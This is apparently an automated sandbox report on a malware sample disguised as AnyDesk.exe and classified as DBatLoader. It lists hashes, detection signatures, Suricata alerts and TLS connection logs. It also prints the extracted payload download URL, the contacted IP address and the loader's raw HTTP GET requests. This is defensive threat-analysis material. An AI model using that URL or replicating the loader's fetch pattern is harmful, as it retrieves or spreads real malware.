Edit tour

Windows Analysis Report
AnyDesk.exe

Overview

General Information

Sample name:	AnyDesk.exe
Analysis ID:	1562860
MD5:	bceea9753420a675af68cda43864438e
SHA1:	0823f156da4f106a26b5738cf9f732d5dd68cdd8
SHA256:	b6a6a59c8b8387233be03bb2111830d4e8aafec6a62a290090ae75cbff5736ec
Tags:	doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

DBatLoader

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected DBatLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

AnyDesk.exe (PID: 6084 cmdline: "C:\Users\user\Desktop\AnyDesk.exe" MD5: BCEEA9753420A675AF68CDA43864438E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://vandeytas.ru.com/233_Hlvzmhuinff"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.AnyDesk.exe.2b20000.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T08:11:09.360851+0100	2028371	3	Unknown Traffic	192.168.2.6	49708	50.7.187.218	443	TCP
2024-11-26T08:11:11.638736+0100	2028371	3	Unknown Traffic	192.168.2.6	49711	50.7.187.218	443	TCP
2024-11-26T08:11:13.914572+0100	2028371	3	Unknown Traffic	192.168.2.6	49713	50.7.187.218	443	TCP
2024-11-26T08:11:16.082568+0100	2028371	3	Unknown Traffic	192.168.2.6	49715	50.7.187.218	443	TCP
2024-11-26T08:11:18.223134+0100	2028371	3	Unknown Traffic	192.168.2.6	49718	50.7.187.218	443	TCP
2024-11-26T08:11:20.675162+0100	2028371	3	Unknown Traffic	192.168.2.6	49725	50.7.187.218	443	TCP
2024-11-26T08:11:22.868570+0100	2028371	3	Unknown Traffic	192.168.2.6	49733	50.7.187.218	443	TCP
2024-11-26T08:11:25.014735+0100	2028371	3	Unknown Traffic	192.168.2.6	49742	50.7.187.218	443	TCP
2024-11-26T08:11:27.172305+0100	2028371	3	Unknown Traffic	192.168.2.6	49749	50.7.187.218	443	TCP
2024-11-26T08:11:29.389804+0100	2028371	3	Unknown Traffic	192.168.2.6	49756	50.7.187.218	443	TCP
2024-11-26T08:11:31.526426+0100	2028371	3	Unknown Traffic	192.168.2.6	49763	50.7.187.218	443	TCP
2024-11-26T08:11:33.621699+0100	2028371	3	Unknown Traffic	192.168.2.6	49770	50.7.187.218	443	TCP
2024-11-26T08:11:35.800978+0100	2028371	3	Unknown Traffic	192.168.2.6	49778	50.7.187.218	443	TCP
2024-11-26T08:11:38.069883+0100	2028371	3	Unknown Traffic	192.168.2.6	49785	50.7.187.218	443	TCP
2024-11-26T08:11:40.254348+0100	2028371	3	Unknown Traffic	192.168.2.6	49792	50.7.187.218	443	TCP
2024-11-26T08:11:42.434121+0100	2028371	3	Unknown Traffic	192.168.2.6	49799	50.7.187.218	443	TCP
2024-11-26T08:11:44.605823+0100	2028371	3	Unknown Traffic	192.168.2.6	49806	50.7.187.218	443	TCP
2024-11-26T08:11:46.781097+0100	2028371	3	Unknown Traffic	192.168.2.6	49812	50.7.187.218	443	TCP
2024-11-26T08:11:48.955453+0100	2028371	3	Unknown Traffic	192.168.2.6	49819	50.7.187.218	443	TCP
2024-11-26T08:11:51.142931+0100	2028371	3	Unknown Traffic	192.168.2.6	49826	50.7.187.218	443	TCP
2024-11-26T08:11:53.230697+0100	2028371	3	Unknown Traffic	192.168.2.6	49833	50.7.187.218	443	TCP
2024-11-26T08:11:55.382503+0100	2028371	3	Unknown Traffic	192.168.2.6	49839	50.7.187.218	443	TCP
2024-11-26T08:11:57.469838+0100	2028371	3	Unknown Traffic	192.168.2.6	49845	50.7.187.218	443	TCP
2024-11-26T08:11:59.684835+0100	2028371	3	Unknown Traffic	192.168.2.6	49852	50.7.187.218	443	TCP
2024-11-26T08:12:01.895489+0100	2028371	3	Unknown Traffic	192.168.2.6	49859	50.7.187.218	443	TCP
2024-11-26T08:12:03.977085+0100	2028371	3	Unknown Traffic	192.168.2.6	49867	50.7.187.218	443	TCP
2024-11-26T08:12:06.305080+0100	2028371	3	Unknown Traffic	192.168.2.6	49874	50.7.187.218	443	TCP
2024-11-26T08:12:08.798340+0100	2028371	3	Unknown Traffic	192.168.2.6	49880	50.7.187.218	443	TCP
2024-11-26T08:12:10.965822+0100	2028371	3	Unknown Traffic	192.168.2.6	49887	50.7.187.218	443	TCP
2024-11-26T08:12:13.341006+0100	2028371	3	Unknown Traffic	192.168.2.6	49894	50.7.187.218	443	TCP
2024-11-26T08:12:15.494269+0100	2028371	3	Unknown Traffic	192.168.2.6	49901	50.7.187.218	443	TCP
2024-11-26T08:12:17.724462+0100	2028371	3	Unknown Traffic	192.168.2.6	49908	50.7.187.218	443	TCP
2024-11-26T08:12:19.929032+0100	2028371	3	Unknown Traffic	192.168.2.6	49915	50.7.187.218	443	TCP
2024-11-26T08:12:22.115166+0100	2028371	3	Unknown Traffic	192.168.2.6	49922	50.7.187.218	443	TCP
2024-11-26T08:12:24.245099+0100	2028371	3	Unknown Traffic	192.168.2.6	49929	50.7.187.218	443	TCP
2024-11-26T08:12:26.450205+0100	2028371	3	Unknown Traffic	192.168.2.6	49936	50.7.187.218	443	TCP
2024-11-26T08:12:28.625681+0100	2028371	3	Unknown Traffic	192.168.2.6	49943	50.7.187.218	443	TCP
2024-11-26T08:12:30.796189+0100	2028371	3	Unknown Traffic	192.168.2.6	49950	50.7.187.218	443	TCP
2024-11-26T08:12:32.969436+0100	2028371	3	Unknown Traffic	192.168.2.6	49957	50.7.187.218	443	TCP
2024-11-26T08:12:35.120345+0100	2028371	3	Unknown Traffic	192.168.2.6	49964	50.7.187.218	443	TCP
2024-11-26T08:12:37.475728+0100	2028371	3	Unknown Traffic	192.168.2.6	49971	50.7.187.218	443	TCP
2024-11-26T08:12:39.583563+0100	2028371	3	Unknown Traffic	192.168.2.6	49979	50.7.187.218	443	TCP
2024-11-26T08:12:41.748298+0100	2028371	3	Unknown Traffic	192.168.2.6	49986	50.7.187.218	443	TCP
2024-11-26T08:12:43.888557+0100	2028371	3	Unknown Traffic	192.168.2.6	49993	50.7.187.218	443	TCP
2024-11-26T08:12:46.022721+0100	2028371	3	Unknown Traffic	192.168.2.6	50000	50.7.187.218	443	TCP
2024-11-26T08:12:48.152774+0100	2028371	3	Unknown Traffic	192.168.2.6	50007	50.7.187.218	443	TCP
2024-11-26T08:12:50.278727+0100	2028371	3	Unknown Traffic	192.168.2.6	50014	50.7.187.218	443	TCP
2024-11-26T08:12:52.422056+0100	2028371	3	Unknown Traffic	192.168.2.6	50020	50.7.187.218	443	TCP
2024-11-26T08:12:54.490537+0100	2028371	3	Unknown Traffic	192.168.2.6	50027	50.7.187.218	443	TCP
2024-11-26T08:12:56.649069+0100	2028371	3	Unknown Traffic	192.168.2.6	50033	50.7.187.218	443	TCP
2024-11-26T08:12:58.769830+0100	2028371	3	Unknown Traffic	192.168.2.6	50040	50.7.187.218	443	TCP
2024-11-26T08:13:00.903306+0100	2028371	3	Unknown Traffic	192.168.2.6	50047	50.7.187.218	443	TCP
2024-11-26T08:13:03.301313+0100	2028371	3	Unknown Traffic	192.168.2.6	50054	50.7.187.218	443	TCP
2024-11-26T08:13:05.421743+0100	2028371	3	Unknown Traffic	192.168.2.6	50061	50.7.187.218	443	TCP
2024-11-26T08:13:07.488315+0100	2028371	3	Unknown Traffic	192.168.2.6	50065	50.7.187.218	443	TCP
2024-11-26T08:13:09.615877+0100	2028371	3	Unknown Traffic	192.168.2.6	50072	50.7.187.218	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: AnyDesk.exe

Malware Configuration Extractor: DBatLoader {"Download Url": ["https://vandeytas.ru.com/233_Hlvzmhuinff"]}

Multi AV Scanner detection for submitted file

Source: AnyDesk.exe	ReversingLabs: Detection: 65%
Source: AnyDesk.exe	Virustotal: Detection: 31%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: AnyDesk.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49915 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49929 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49943 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49957 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49964 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49971 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50047 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50072 version: TLS 1.2

Source:	Binary string: easinvoker.pdb source: AnyDesk.exe, AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2119845710.000000007FA90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: AnyDesk.exe, 00000000.00000003.2120469469.00000000027D1000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3368038850.0000000002A0B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2119845710.000000007FA90000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\AnyDesk.exe

Code function: 0_2_02B25908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_02B25908

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://vandeytas.ru.com/233_Hlvzmhuinff

Source: C:\Users\user\Desktop\AnyDesk.exe

Code function: 0_2_02B3E4B8 InternetCheckConnectionA,

0_2_02B3E4B8

Source: Joe Sandbox View

IP Address: 50.7.187.218 50.7.187.218

Source: Joe Sandbox View

ASN Name: COGENT-174US COGENT-174US

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49725 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49770 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49742 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49778 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49785 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49763 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49799 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49812 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49806 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49833 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49839 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49733 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49845 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49880 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49874 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49859 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49887 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49749 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49756 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49792 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49901 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49826 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49915 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49922 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49936 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49950 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49957 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49943 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49852 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49819 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49867 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49964 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49971 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49979 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49986 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49993 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49929 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50000 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49894 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50007 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50014 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50020 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50033 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49908 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50047 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50027 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50040 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50054 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50061 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50072 -> 50.7.187.218:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50065 -> 50.7.187.218:443

Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
